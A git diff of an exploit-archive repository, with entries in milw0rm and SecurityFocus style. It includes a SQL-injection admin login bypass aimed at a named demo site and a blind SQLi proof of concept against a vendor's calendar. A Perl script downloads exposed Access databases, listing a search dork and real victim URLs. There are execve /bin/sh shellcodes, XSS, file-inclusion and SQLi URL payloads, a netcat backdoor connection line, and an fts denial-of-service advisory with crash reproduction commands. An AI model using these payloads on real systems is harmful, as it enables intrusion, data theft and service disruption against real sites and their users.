information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +Bypass : ........ + +Go To The Admin Panel. +and Login with this information : + +username : r0' or ' 1=1-- +password : r0' or ' 1=1-- + +To Test : + +http://activewebsoftwares.com/demoactivewebhelpdesk/adminlogin.aspx?ReturnURL=admindefault.aspx + +EnjoY. + + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = +___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-29] diff --git a/platforms/asp/webapps/7327.txt b/platforms/asp/webapps/7327.txt index c659b87e2..58b16470c 100755 --- a/platforms/asp/webapps/7327.txt +++ b/platforms/asp/webapps/7327.txt @@ -1,52 +1,52 @@ -[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ - - [~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability - - [~]Vendor: www.mxmania.net - - [~]Software: Calendar Mx Professional - - [~]author: ((Ñ3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] --------------------------------{str0ke}--------------------------- - - - [~]3xpL0!7 4 d3m0: - - http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND} - - - [~] 8L!/\/D: - - 7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1 - - f4L53: calendar_Eventupdate.asp?ID=1 and 1=2 - - -N073: - -! 7h!/\/k u can f!nd m0r3 - -just let your m1nd breath ;) - -[[~]----------------------------------------{str0ke}---------------------------------------------- - - - [~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY - [~] - [~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke} - [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - -[~]-----------------------------------------{str0ke}---------------------------------------------- - -# milw0rm.com [2008-12-03] +[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ + + [~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability + + [~]Vendor: www.mxmania.net + + [~]Software: Calendar Mx Professional + + [~]author: ((Ñ3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] --------------------------------{str0ke}--------------------------- + + + [~]3xpL0!7 4 d3m0: + + http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND} + + + [~] 8L!/\/D: + + 7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1 + + f4L53: calendar_Eventupdate.asp?ID=1 and 1=2 + + +N073: + +! 7h!/\/k u can f!nd m0r3 + +just let your m1nd breath ;) + +[[~]----------------------------------------{str0ke}---------------------------------------------- + + + [~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY + [~] + [~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke} + [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + +[~]-----------------------------------------{str0ke}---------------------------------------------- + +# milw0rm.com [2008-12-03] diff --git a/platforms/asp/webapps/8610.pl b/platforms/asp/webapps/8610.pl index e36a99621..6185d904a 100755 --- a/platforms/asp/webapps/8610.pl +++ b/platforms/asp/webapps/8610.pl @@ -1,51 +1,51 @@ -#!/usr/bin/perl -# -# -# Ublog access version -# mdb-database/blog.mdb -# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N -# demos : -# http://radiologyhunters.com/blog/mdb-database/blog.mdb -# http://foges.net/mdb-database/blog.mdb -# http://www.geoaurea.it/mdb-database/blog.mdb -# -# -use LWP::Simple; -use LWP::UserAgent; - -print "\tUblog access version Arbitrary Database Disclosure Exploit\n"; - -print "\t****************************************************************\n"; -print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n"; -print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n"; -print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n"; -print "\t* From : MoroccO Figuig/Oujda City *\n"; -print "\t****************************************************************\n\n\n\n"; -if(@ARGV < 1) -{ -&help; exit(); -} -sub help() -{ -print "[X] Usage : perl $0 site \n"; -print "[X] Exemple : perl $0 www.site.com \n"; -} -($site) = @ARGV; -print("Please Wait ! Connecting To The Server ......\n\n"); -sleep(5); -$database = "mdb-database/blog.mdb"; -my $exploit = "http://" . $site . "/" . $database; -print("Searching For file ...\n\n"); -sleep(3); -$doexploit=get $exploit; -if($doexploit){ -print("..........................File Contents...........................\n"); -print("$doexploit\n"); -print("..............................EOF.................................\n"); -} -else { -help(); -exit; -} - -# milw0rm.com [2009-05-04] +#!/usr/bin/perl +# +# +# Ublog access version +# mdb-database/blog.mdb +# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N +# demos : +# http://radiologyhunters.com/blog/mdb-database/blog.mdb +# http://foges.net/mdb-database/blog.mdb +# http://www.geoaurea.it/mdb-database/blog.mdb +# +# +use LWP::Simple; +use LWP::UserAgent; + +print "\tUblog access version Arbitrary Database Disclosure Exploit\n"; + +print "\t****************************************************************\n"; +print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n"; +print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n"; +print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n"; +print "\t* From : MoroccO Figuig/Oujda City *\n"; +print "\t****************************************************************\n\n\n\n"; +if(@ARGV < 1) +{ +&help; exit(); +} +sub help() +{ +print "[X] Usage : perl $0 site \n"; +print "[X] Exemple : perl $0 www.site.com \n"; +} +($site) = @ARGV; +print("Please Wait ! Connecting To The Server ......\n\n"); +sleep(5); +$database = "mdb-database/blog.mdb"; +my $exploit = "http://" . $site . "/" . $database; +print("Searching For file ...\n\n"); +sleep(3); +$doexploit=get $exploit; +if($doexploit){ +print("..........................File Contents...........................\n"); +print("$doexploit\n"); +print("..............................EOF.................................\n"); +} +else { +help(); +exit; +} + +# milw0rm.com [2009-05-04] diff --git a/platforms/bsd/dos/8163.txt b/platforms/bsd/dos/8163.txt index b3e04fc3e..1fb253045 100755 --- a/platforms/bsd/dos/8163.txt +++ b/platforms/bsd/dos/8163.txt @@ -1,237 +1,237 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - -[libc:fts_*():multiple vendors, Denial-of-service ] - -Author: Maksymilian Arciemowicz -SecurityReason.com -Date: -- - Dis.: 21.10.2008 -- - Pub.: 04.03.2009 - -CVE: CVE-2009-0537 - -We are going informing all vendors, about this problem. - -Affected Software (official): -- - OpenBSD 4.4 - /usr/src/lib/libc/gen/fts.c -- - Microsoft Interix - 6.0 10.0.6030.0 x86 -- - Microsft Vista Enterprise - SearchIndexer.exe - -probably more... - -Original URL: -http://securityreason.com/achievement_securityalert/60 - -- --- 0.Description --- - -The fts functions are provided for traversing UNIX file hierarchies. -The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. -The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. -The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy. - - typedef struct _ftsent { - unsigned short fts_info; /* flags for FTSENT structure */ - char *fts_accpath; /* access path */ - char *fts_path; /* root path */ - size_t fts_pathlen; /* strlen(fts_path) */ - char *fts_name; /* file name */ - size_t fts_namelen; /* strlen(fts_name) */ - short fts_level; /* depth (-1 to N) */ - int fts_errno; /* file errno */ - long fts_number; /* local numeric value */ - void *fts_pointer; /* local address value */ - struct _ftsent *fts_parent; /* parent directory */ - struct _ftsent *fts_link; /* next file structure */ - struct _ftsent *fts_cycle; /* cycle structure */ - struct stat *fts_statp; /* stat(2) information */ - } FTSENT; - -- --- 1. libc:fts_*():multiple vendors, Denial-of-service --- -The main problem exist in fts_level from ftsent structure. Type of fts_level is short. - -let's see /usr/src/lib/libc/gen/fts.c (OpenBSD) - -- ---line-616-625--- - /* - * Figure out the max file name length that can be stored in the - * current path -- the inner loop allocates more path as necessary. - * We really wouldn't have to do the maxlen calculations here, we - * could do them in fts_read before returning the path, but it's a - * lot easier here since the length is part of the dirent structure. - * - * If not changing directories set a pointer so that can just append - * each new name into the path. - */ -- ---line-616-625--- - -"We really wouldn't have to do the maxlen calculations here..." - -Here should be some level or pathlen monitor. Should. - - short fts_level; /* depth (-1 to N) */ - -fts_level is short type, no aleph zero - -- ---line-247-249--- -#define NAPPEND(p) \ - (p->fts_path[p->fts_pathlen - 1] == '/' \ - ? p->fts_pathlen - 1 : p->fts_pathlen) -- ---line-247-249--- - -this function will crash, when we will requests to wrong allocated memory. - -So, what is wrong: - -127# pwd -/home/cxib -127# du /home/ -4 /home/cxib/.ssh -Segmentation fault (core dumped) -127# rm -rf Samotnosc -Segmentation fault (core dumped) -127# chmod -R 000 Samotnosc -Segmentation fault (core dumped) - - -127# gdb -q du -(no debugging symbols found) -(gdb) r /home/ -Starting program: /usr/bin/du /home/ -4 /home/cxib/.ssh - -Program received signal SIGSEGV, Segmentation fault. -0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385 -385 name: t = sp->fts_path + NAPPEND(p->fts_parent); -(gdb) print p->fts_level -$1 = -19001 -(gdb) print p->fts_path -$2 = 0x837c9000
- -and we have answer. - - -127# cd /home/cxib -127# mkdir len -127# cd len -127# mkdir 24 -127# mkdir 23 -127# mkdir 22 -127# cd 22 -127# perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' -127# du . -Segmentation fault (core dumped) -127# cd ../23/ -127# perl -e '$a="C"x23;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' -127# du . -Segmentation fault (core dumped) -127# cd ../24/ -127# perl -e '$a="C"x24;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' -127# du . -/* Will print correctly output */ - -In all cases, the function should return an error flag "ENAMETOOLONG". - -The security consequences can be derived from the crash of the program. All combinations like " while ( fts_read ( ) ) " and " ftw ( ) " function, constitute a potential risk. - -Examples of vulnerable programs: -du -rm -chmod -R -chgrp -R - -In the case of Microsoft Interix, the situation is very similar. - -% uname -a -Interix cxib-PC 6.0 10.0.6030.0 x86 Intel_x86_Family6_Model123_Stepping6 -% du pa -Segmentation fault - -Vista Enterprise does not allow for the creation of the name too long. At the same time, has great problems with the operation of such nodes. -Using Interix subsystem, you can create a deep tree to the NTFS partition. - -example: -fts_level -10000 - -Then, we can no longer do anything with incorrect directory from the Windows API. -If you try change permissions, copy the directory, you will receive a lot of bugs (stack overflow etc.). - -SearchIndexer.exe will crash many times - -- --- -Faulting application SearchIndexer.exe, version 7.0.6001.16503, time -stamp 0x483b99af, faulting module msvcrt.dll, version 7.0.6001.18000, -time stamp 0x4791a727, exception code 0x40000015, fault offset -0x00053adb, process id 0x364, application start time 0x01c99276bd383759. -- --- - -In some cases, is possible to permanently lock the service. - -Interesting behavior we can see an example - -C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\Not_existed_node\ - -(try put this path into explorer) - -where - -C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\ - -of course exists - -We do not see the potential risk, but the algorithm should be changed. - -We publish this note, because the vulnerability was only tested for OpenBSD. Many other systems, reacts strangely to the potential testing. - -- --- 2. Fix --- -http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c - -Fix by Otto Moerbeek: - -Index: fts.c -=================================================================== -RCS file: /cvs/src/lib/libc/gen/fts.c,v -retrieving revision 1.41 -diff -u -p -r1.41 fts.c -- --- fts.c 27 Dec 2008 12:30:13 -0000 1.41 -+++ fts.c 10 Feb 2009 09:00:24 -0000 -@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type) - len++; - maxlen = sp->fts_pathlen - len; - -+ if (cur->fts_level == SHRT_MAX) { -+ (void)closedir(dirp); -+ cur->fts_info = FTS_ERR; -+ SET(FTS_STOP); -+ errno = ENAMETOOLONG; -+ return (NULL); -+ } -+ - level = cur->fts_level + 1; - - /* Read the directory, attaching each entry to the `link' pointer. */ - - -- --- 3. Greets --- -Very thanks for Otto Moerbeek and all OpenBSD devs. - -sp3x Infospec schain Chujwamwdupe p_e_a pi3 - -- --- 4. Contact --- -Author: SecurityReason.com [ Maksymilian Arciemowicz ] -Email: cxib [a.t] securityreason [d00t] com -GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg -http://securityreason.com -http://securityreason.pl ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.9 (OpenBSD) - -iEYEARECAAYFAkmu7s4ACgkQpiCeOKaYa9ZEjgCg1v0YJVH7nAWmsBnD0szmxY2Q -07cAoMd+Mh8AWxuipuOTVAtBCRmNJVob -=tXhh ------END PGP SIGNATURE----- - -# milw0rm.com [2009-03-05] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +[libc:fts_*():multiple vendors, Denial-of-service ] + +Author: Maksymilian Arciemowicz +SecurityReason.com +Date: +- - Dis.: 21.10.2008 +- - Pub.: 04.03.2009 + +CVE: CVE-2009-0537 + +We are going informing all vendors, about this problem. + +Affected Software (official): +- - OpenBSD 4.4 + /usr/src/lib/libc/gen/fts.c +- - Microsoft Interix + 6.0 10.0.6030.0 x86 +- - Microsft Vista Enterprise + SearchIndexer.exe + +probably more... + +Original URL: +http://securityreason.com/achievement_securityalert/60 + +- --- 0.Description --- + +The fts functions are provided for traversing UNIX file hierarchies. +The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. +The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. +The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy. + + typedef struct _ftsent { + unsigned short fts_info; /* flags for FTSENT structure */ + char *fts_accpath; /* access path */ + char *fts_path; /* root path */ + size_t fts_pathlen; /* strlen(fts_path) */ + char *fts_name; /* file name */ + size_t fts_namelen; /* strlen(fts_name) */ + short fts_level; /* depth (-1 to N) */ + int fts_errno; /* file errno */ + long fts_number; /* local numeric value */ + void *fts_pointer; /* local address value */ + struct _ftsent *fts_parent; /* parent directory */ + struct _ftsent *fts_link; /* next file structure */ + struct _ftsent *fts_cycle; /* cycle structure */ + struct stat *fts_statp; /* stat(2) information */ + } FTSENT; + +- --- 1. libc:fts_*():multiple vendors, Denial-of-service --- +The main problem exist in fts_level from ftsent structure. Type of fts_level is short. + +let's see /usr/src/lib/libc/gen/fts.c (OpenBSD) + +- ---line-616-625--- + /* + * Figure out the max file name length that can be stored in the + * current path -- the inner loop allocates more path as necessary. + * We really wouldn't have to do the maxlen calculations here, we + * could do them in fts_read before returning the path, but it's a + * lot easier here since the length is part of the dirent structure. + * + * If not changing directories set a pointer so that can just append + * each new name into the path. + */ +- ---line-616-625--- + +"We really wouldn't have to do the maxlen calculations here..." + +Here should be some level or pathlen monitor. Should. + + short fts_level; /* depth (-1 to N) */ + +fts_level is short type, no aleph zero + +- ---line-247-249--- +#define NAPPEND(p) \ + (p->fts_path[p->fts_pathlen - 1] == '/' \ + ? p->fts_pathlen - 1 : p->fts_pathlen) +- ---line-247-249--- + +this function will crash, when we will requests to wrong allocated memory. + +So, what is wrong: + +127# pwd +/home/cxib +127# du /home/ +4 /home/cxib/.ssh +Segmentation fault (core dumped) +127# rm -rf Samotnosc +Segmentation fault (core dumped) +127# chmod -R 000 Samotnosc +Segmentation fault (core dumped) + + +127# gdb -q du +(no debugging symbols found) +(gdb) r /home/ +Starting program: /usr/bin/du /home/ +4 /home/cxib/.ssh + +Program received signal SIGSEGV, Segmentation fault. +0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385 +385 name: t = sp->fts_path + NAPPEND(p->fts_parent); +(gdb) print p->fts_level +$1 = -19001 +(gdb) print p->fts_path +$2 = 0x837c9000
+ +and we have answer. + + +127# cd /home/cxib +127# mkdir len +127# cd len +127# mkdir 24 +127# mkdir 23 +127# mkdir 22 +127# cd 22 +127# perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' +127# du . +Segmentation fault (core dumped) +127# cd ../23/ +127# perl -e '$a="C"x23;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' +127# du . +Segmentation fault (core dumped) +127# cd ../24/ +127# perl -e '$a="C"x24;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' +127# du . +/* Will print correctly output */ + +In all cases, the function should return an error flag "ENAMETOOLONG". + +The security consequences can be derived from the crash of the program. All combinations like " while ( fts_read ( ) ) " and " ftw ( ) " function, constitute a potential risk. + +Examples of vulnerable programs: +du +rm +chmod -R +chgrp -R + +In the case of Microsoft Interix, the situation is very similar. + +% uname -a +Interix cxib-PC 6.0 10.0.6030.0 x86 Intel_x86_Family6_Model123_Stepping6 +% du pa +Segmentation fault + +Vista Enterprise does not allow for the creation of the name too long. At the same time, has great problems with the operation of such nodes. +Using Interix subsystem, you can create a deep tree to the NTFS partition. + +example: +fts_level -10000 + +Then, we can no longer do anything with incorrect directory from the Windows API. +If you try change permissions, copy the directory, you will receive a lot of bugs (stack overflow etc.). + +SearchIndexer.exe will crash many times + +- --- +Faulting application SearchIndexer.exe, version 7.0.6001.16503, time +stamp 0x483b99af, faulting module msvcrt.dll, version 7.0.6001.18000, +time stamp 0x4791a727, exception code 0x40000015, fault offset +0x00053adb, process id 0x364, application start time 0x01c99276bd383759. +- --- + +In some cases, is possible to permanently lock the service. + +Interesting behavior we can see an example + +C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\Not_existed_node\ + +(try put this path into explorer) + +where + +C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\ + +of course exists + +We do not see the potential risk, but the algorithm should be changed. + +We publish this note, because the vulnerability was only tested for OpenBSD. Many other systems, reacts strangely to the potential testing. + +- --- 2. Fix --- +http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c + +Fix by Otto Moerbeek: + +Index: fts.c +=================================================================== +RCS file: /cvs/src/lib/libc/gen/fts.c,v +retrieving revision 1.41 +diff -u -p -r1.41 fts.c +- --- fts.c 27 Dec 2008 12:30:13 -0000 1.41 ++++ fts.c 10 Feb 2009 09:00:24 -0000 +@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type) + len++; + maxlen = sp->fts_pathlen - len; + ++ if (cur->fts_level == SHRT_MAX) { ++ (void)closedir(dirp); ++ cur->fts_info = FTS_ERR; ++ SET(FTS_STOP); ++ errno = ENAMETOOLONG; ++ return (NULL); ++ } ++ + level = cur->fts_level + 1; + + /* Read the directory, attaching each entry to the `link' pointer. */ + + +- --- 3. Greets --- +Very thanks for Otto Moerbeek and all OpenBSD devs. + +sp3x Infospec schain Chujwamwdupe p_e_a pi3 + +- --- 4. Contact --- +Author: SecurityReason.com [ Maksymilian Arciemowicz ] +Email: cxib [a.t] securityreason [d00t] com +GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg +http://securityreason.com +http://securityreason.pl +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.9 (OpenBSD) + +iEYEARECAAYFAkmu7s4ACgkQpiCeOKaYa9ZEjgCg1v0YJVH7nAWmsBnD0szmxY2Q +07cAoMd+Mh8AWxuipuOTVAtBCRmNJVob +=tXhh +-----END PGP SIGNATURE----- + +# milw0rm.com [2009-03-05] diff --git a/platforms/bsd_x86/shellcode/13253.c b/platforms/bsd_x86/shellcode/13253.c deleted file mode 100755 index 895cfb5c2..000000000 --- a/platforms/bsd_x86/shellcode/13253.c +++ /dev/null @@ -1,29 +0,0 @@ -/* - *BSD version - FreeBSD, OpenBSD, NetBSD. - - s0t4ipv6@shellcode.com.ar - - 57 bytes. - - -Encriptado execve(/bin/sh); - - Para mas informacion ver - http://www.shellcode.com.ar/es/proyectos.html -*/ - -char shellcode[]= -"\xeb\x1b\x5e\x31\xc0\x6a\x1a\x6a\x17\x59\x49\x5b\x8a\x04\x0e" -"\xf6\xd3\x30\xd8\x88\x04\x0e\x50\x85\xc9\x75\xef\xeb\x05\xe8" -"\xe0\xff\xff\xff\x0e\x6f\xc7\xf9\xbe\xa3\xe4\xff\xb8\xff\xb2" -"\xf4\x1f\x95\x4c\xfb\xf8\xfc\x1f\x74\x09\xb2\x65"; - -main() -{ - int *ret; - printf("Shellcode lenght=%d\n",sizeof(shellcode)); - ret=(int*)&ret+2; - (*ret)=(int)shellcode; -} - -// milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsdi_x86/shellcode/13259.txt b/platforms/bsdi_x86/shellcode/13259.txt deleted file mode 100755 index caa9f6555..000000000 --- a/platforms/bsdi_x86/shellcode/13259.txt +++ /dev/null @@ -1,12 +0,0 @@ -/* - * BSDi - * execve() of /bin/sh by v9 (v9@fakehalo.org) - */ - -static char exec[]= - "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */ - "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */ - "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */ - "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */ - -# milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/cfm/webapps/30202.txt b/platforms/cfm/webapps/30202.txt new file mode 100755 index 000000000..986463ade --- /dev/null +++ b/platforms/cfm/webapps/30202.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24528/info + +FuseTalk is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +NOTE: Specific vulnerable versions were not disclosed. Reports also indicate that this issue has been addressed in the latest version of the application. + +http://www.example.com/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=[SQL_INJ] \ No newline at end of file diff --git a/platforms/cfm/webapps/30206.txt b/platforms/cfm/webapps/30206.txt new file mode 100755 index 000000000..45e7619de --- /dev/null +++ b/platforms/cfm/webapps/30206.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24563/info + +FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/forum/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss] \ No newline at end of file diff --git a/platforms/cgi/webapps/1004.php b/platforms/cgi/webapps/1004.php index 4fe85fca6..3a8e3ca24 100755 --- a/platforms/cgi/webapps/1004.php +++ b/platforms/cgi/webapps/1004.php @@ -95,6 +95,6 @@ if (!$s0ck3t) { } fclose($s0ck3t); } -?> - -# milw0rm.com [2005-05-20] +?> + +# milw0rm.com [2005-05-20] diff --git a/platforms/cgi/webapps/1005.pl b/platforms/cgi/webapps/1005.pl index ba23b6f25..39344b294 100755 --- a/platforms/cgi/webapps/1005.pl +++ b/platforms/cgi/webapps/1005.pl @@ -64,6 +64,6 @@ print "\n\n$$$ OK -- Now Try: Nc -v www.host.com 4444 $$$\n"; print "$$ if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP $$\n"; ### EOF ### - - -# milw0rm.com [2005-05-20] + + +# milw0rm.com [2005-05-20] diff --git a/platforms/cgi/webapps/30156.txt b/platforms/cgi/webapps/30156.txt new file mode 100755 index 000000000..cae3da6bf --- /dev/null +++ b/platforms/cgi/webapps/30156.txt @@ -0,0 +1,17 @@ +# Exploit Title: CGILua SQL Injection +# Google Dork: inurl:/cgilua.exe/sys/ +# Vendor Homepage: https://web.tecgraf.puc-rio.br/cgilua/ +# Version: < = 3.0 +# Date: 09/12/2013 +# Exploit Author: aceeeeeeeer +# Contact: http://www.twitter.com/aceeeeeeeer +# Tested on: Windows +#################################################################################### +greetz: CrazyDuck - Synchr0N1ze - No\one - Kouback_TR_ - unknow_antisec - +elCorpse +Clandestine - MentorSec - Titio Vamp - LLL - Slayer Owner - masoqfellipe +#################################################################################### + +Exploit: /cgi/cgilua.exe/sys/start.htm?sid=[ SQLi ] + +Demo: http://www.server.com/publique/cgi/cgilua.exe/sys/start.htm?sid=157 diff --git a/platforms/cgi/webapps/30199.txt b/platforms/cgi/webapps/30199.txt new file mode 100755 index 000000000..612e44bff --- /dev/null +++ b/platforms/cgi/webapps/30199.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24516/info + +WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +Exploiting this issue may allow an unauthorized user to view files and execute local scripts. + +http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13273.c b/platforms/freebsd_x86/shellcode/13273.c index becfead93..0a2e3d683 100755 --- a/platforms/freebsd_x86/shellcode/13273.c +++ b/platforms/freebsd_x86/shellcode/13273.c @@ -21,6 +21,6 @@ char fbsd_execve[]= int main() { void (*run)()=(void *)fbsd_execve; printf("%d bytes \n",strlen(fbsd_execve)); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/hardware/dos/30167.txt b/platforms/hardware/dos/30167.txt new file mode 100755 index 000000000..2bbfdd538 --- /dev/null +++ b/platforms/hardware/dos/30167.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24388/info + +Packeteer PacketShaper is prone to a remote denial-of-service vulnerability because the application's web interface fails to properly handle unexpected requests. + +Successfully exploiting this issue allows remote, authenticated attackers to reboot affected devices, denying service to legitimate users. + +PacketShaper 7.3.0g2 and 7.5.0g1 are vulnerable to this issue; other versions may also be affected. + +http://www.example.com/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE= \ No newline at end of file diff --git a/platforms/hardware/remote/30164.txt b/platforms/hardware/remote/30164.txt new file mode 100755 index 000000000..ee5a47e16 --- /dev/null +++ b/platforms/hardware/remote/30164.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24374/info + +OfficeConnect Secure Router is prone to a cross-site scripting vulnerability. + +Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects OfficeConnect Secure Router firmware 1.04-168; other versions may also be affected. + +http://example.com/cgi-bin/admin?page=1&tk=>[xss] \ No newline at end of file diff --git a/platforms/hardware/webapps/30056.txt b/platforms/hardware/webapps/30056.txt deleted file mode 100755 index 832d89892..000000000 --- a/platforms/hardware/webapps/30056.txt +++ /dev/null @@ -1,191 +0,0 @@ -Document Title: -=============== -Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities - - -References (Source): -==================== -http://www.vulnerability-lab.com/get_content.php?id=1152 - - -Release Date: -============= -2013-12-04 - - -Vulnerability Laboratory ID (VL-ID): -==================================== -1152 - - -Common Vulnerability Scoring System: -==================================== -6.7 - - -Product & Service Introduction: -=============================== -Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos -between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless -Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone, -from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your -devices under the same Wi-Fi network. - -(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ ) - - -Abstract Advisory Information: -============================== -The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS. - - -Vulnerability Disclosure Timeline: -================================== -2012-11-30: Public Disclosure (Vulnerability Laboratory) - - -Discovery Status: -================= -Published - - -Affected Product(s): -==================== -Wireless Transfer App COM -Product: Wireless Transfer App 3.7 - - -Exploitation Technique: -======================= -Remote - - -Severity Level: -=============== -High - - -Technical Details & Description: -================================ -A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS. -The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application. - 